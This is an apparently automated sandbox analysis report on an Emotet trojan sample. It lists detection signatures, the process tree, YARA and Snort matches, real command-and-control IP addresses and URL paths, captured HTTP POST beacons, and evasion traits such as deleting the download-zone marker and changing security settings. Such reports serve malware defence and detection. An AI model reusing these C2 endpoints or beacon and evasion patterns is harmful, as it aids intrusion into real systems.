
Analysis Report FsWcL0gpTv

Overview

General Information

Sample Name: FsWcL0gpTv (renamed file extension from none to exe)
Analysis ID: 317598
MD5: d1cef4c90a48a4788d9ce4208ee769cb
SHA1: 5c17f1665881c62c9cee7bded2df3c2ac557cd38
SHA256: eabe9e59682457968198f818f0d2d280d397a001d7fee58a2de6c9acc0d2651a

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • FsWcL0gpTv.exe (PID: 5332 cmdline: 'C:\Users\user\Desktop\FsWcL0gpTv.exe' MD5: D1CEF4C90A48A4788D9CE4208EE769CB)
    • WpPortingLibrary.exe (PID: 5896 cmdline: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe MD5: D1CEF4C90A48A4788D9CE4208EE769CB)
  • svchost.exe (PID: 5452 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4012 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3696 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5816 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1748 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6164 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6256 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6304 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6344 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5956 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6460 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.238986600.0000000002EB4000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.500653398.00000000029F0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000002.239016780.0000000002EF1000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000003.00000002.500762111.0000000002A34000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000000.00000002.238943742.0000000002E70000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Unpacked PEs

Source | Rule | Description | Author
0.2.FsWcL0gpTv.exe.2ef0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
3.2.WpPortingLibrary.exe.2a70000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: FsWcL0gpTv.exe | Virustotal: Detection: 61%
Source: FsWcL0gpTv.exe | Metadefender: Detection: 45%
Source: FsWcL0gpTv.exe | ReversingLabs: Detection: 70%
Machine Learning detection for sample
Source: FsWcL0gpTv.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A72290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap,3_2_02A72290
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,3_2_02A72650
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A71FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash,3_2_02A71FB0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF38F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,0_2_02EF38F0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,3_2_02A738F0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404300 ET CNC Feodo Tracker Reported CnC Server TCP group 1 192.168.2.5:49707 -> 102.182.145.130:80
Source: Traffic | Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.5:49723 -> 173.173.254.105:80
Source: Traffic | Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49734 -> 64.207.182.168:8080
Source: Traffic | Snort IDS: 2404336 ET CNC Feodo Tracker Reported CnC Server TCP group 19 192.168.2.5:49737 -> 51.89.199.141:8080
Source: global traffic | TCP traffic: 192.168.2.5:49734 -> 64.207.182.168:8080
Source: global traffic | TCP traffic: 192.168.2.5:49737 -> 51.89.199.141:8080
Source: Joe Sandbox View | IP Address: 102.182.145.130
Source: Joe Sandbox View | IP Address: 64.207.182.168
Source: Joe Sandbox View | ASN Name: AfrihostZA
Source: Joe Sandbox View | ASN Name: GO-DADDY-COM-LLCUS
Source: global traffic | TCP traffic: 192.168.2.5:49707 -> 102.182.145.130:80
Source: global traffic | TCP traffic: 192.168.2.5:49723 -> 173.173.254.105:80
Source: global traffic | HTTP traffic detected:
    POST /hdXW/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 64.207.182.168/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=--------LoZ3XEj1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 64.207.182.168:8080
    Content-Length: 4612
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 51.89.199.141/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=------------wo3M7HGlGf1K
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 51.89.199.141:8080
    Content-Length: 4580
    Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 102.182.145.130
Source: unknown | TCP traffic detected without corresponding DNS query: 173.173.254.105
Source: unknown | TCP traffic detected without corresponding DNS query: 64.207.182.168
Source: unknown | TCP traffic detected without corresponding DNS query: 51.89.199.141
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,3_2_02A729B0
Source: unknown | HTTP traffic detected:
    POST /hdXW/ HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: keep-alive
    Referer: 64.207.182.168/
    Upgrade-Insecure-Requests: 1
    Content-Type: multipart/form-data; boundary=--------LoZ3XEj1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 64.207.182.168:8080
    Content-Length: 4612
    Cache-Control: no-cache
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp | String found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp | String found in binary or memory: http://102.182.145.130/h84kVVvyZLtR8YY/cEnY6TFzK/AmNS6FU7LXcmZHrA26R/A6CfQNnHg6slnlDaP5/X-
Source: WpPortingLibrary.exe, 00000003.00000003.361330882.000000000325E000.00000004.00000001.sdmp | String found in binary or memory: http://173.173.254.105/LN19JoV6Jo34Ba/UOjzG3KqtwalQ/Gy4EZLufQaYY3rmRrq0/Su721nFGl8jnm9/v1RyG4lzB/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp | String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/
Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmp | String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/.
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp | String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/T)
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp | String found in binary or memory: http://51.89.199.141:8080/0fVL69rn/PVbyHTnRzq/3Wii09TSPPBnNOl/d(
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp | String found in binary or memory: http://64.207.182.168:8080/hdXW/
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp | String found in binary or memory: http://64.207.182.168:8080/hdXW/O
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp | String found in binary or memory: http://64.207.182.168:8080/hdXW/l
Source: WpPortingLibrary.exe, 00000003.00000002.503525412.0000000003250000.00000004.00000001.sdmp | String found in binary or memory: http://64.207.182.168:8080/hdXW/ll
Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000004.00000002.501472156.0000017996C16000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000004.00000002.501376722.0000017996C00000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000004.00000002.503056387.0000017997060000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000009.00000002.304660388.00000189FAC13000.00000004.00000001.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000002.499986642.000002776643E000.00000004.00000001.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.304362631.00000189FAC63000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000009.00000002.304715723.00000189FAC3A000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304461962.00000189FAC57000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304362631.00000189FAC63000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.304423488.00000189FAC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 00000009.00000003.304378373.00000189FAC60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 00000009.00000003.304448108.00000189FAC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 00000009.00000003.282341155.00000189FAC31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 00000009.00000002.304715723.00000189FAC3A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 00000009.00000002.304752691.00000189FAC4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: WpPortingLibrary.exe, 00000003.00000002.500142679.0000000000E5A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Emotet
Source: Yara match | File source: 00000000.00000002.238986600.0000000002EB4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.500653398.00000000029F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.239016780.0000000002EF1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.500762111.0000000002A34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.238943742.0000000002E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.500809704.0000000002A71000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.FsWcL0gpTv.exe.2ef0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.WpPortingLibrary.exe.2a70000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A72650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 3_2_02A72650
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | File created: C:\Windows\SysWOW64\offreg\
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | File deleted: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe:Zone.Identifier
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF8240 0_2_02EF8240
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF3BA0 0_2_02EF3BA0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF1C70 0_2_02EF1C70
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF7740 0_2_02EF7740
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF3F20 0_2_02EF3F20
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF6530 0_2_02EF6530
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF3D10 0_2_02EF3D10
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E792DE 0_2_02E792DE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E75ABE 0_2_02E75ABE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E7573E 0_2_02E7573E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E780CE 0_2_02E780CE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E758AE 0_2_02E758AE
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E87069 0_2_02E87069
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E7380E 0_2_02E7380E
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02E79DDE 0_2_02E79DDE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A78240 3_2_02A78240
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A73BA0 3_2_02A73BA0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A73F20 3_2_02A73F20
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A76530 3_2_02A76530
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A73D10 3_2_02A73D10
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A71C70 3_2_02A71C70
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A77740 3_2_02A77740
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_029F5ABE 3_2_029F5ABE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_029F92DE 3_2_029F92DE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_029F573E 3_2_029F573E
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_029F58AE 3_2_029F58AE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_029F80CE 3_2_029F80CE
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_029F380E 3_2_029F380E
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A07069 3_2_02A07069
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_029F9DDE 3_2_029F9DDE
Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs FsWcL0gpTv.exe
Source: FsWcL0gpTv.exe, 00000000.00000002.239297268.0000000003410000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs FsWcL0gpTv.exe
Source: FsWcL0gpTv.exe, 00000000.00000002.239187518.0000000003310000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs FsWcL0gpTv.exe
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: classification engine | Classification label: mal80.troj.evad.winEXE@16/5@0/5
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: CloseServiceHandle,_snwprintf,CreateServiceW,CloseServiceHandle, 0_2_02EF87D0
Source: C:\Windows\SysWOW64\offreg\WpPortingLibrary.exe | Code function: 3_2_02A74CB0 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,FindCloseChangeNotification, 3_2_02A74CB0
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Code function: 0_2_02EF5070 EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap, 0_2_02EF5070
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5284:120:WilError_01
Source: FsWcL0gpTv.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\FsWcL0gpTv.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
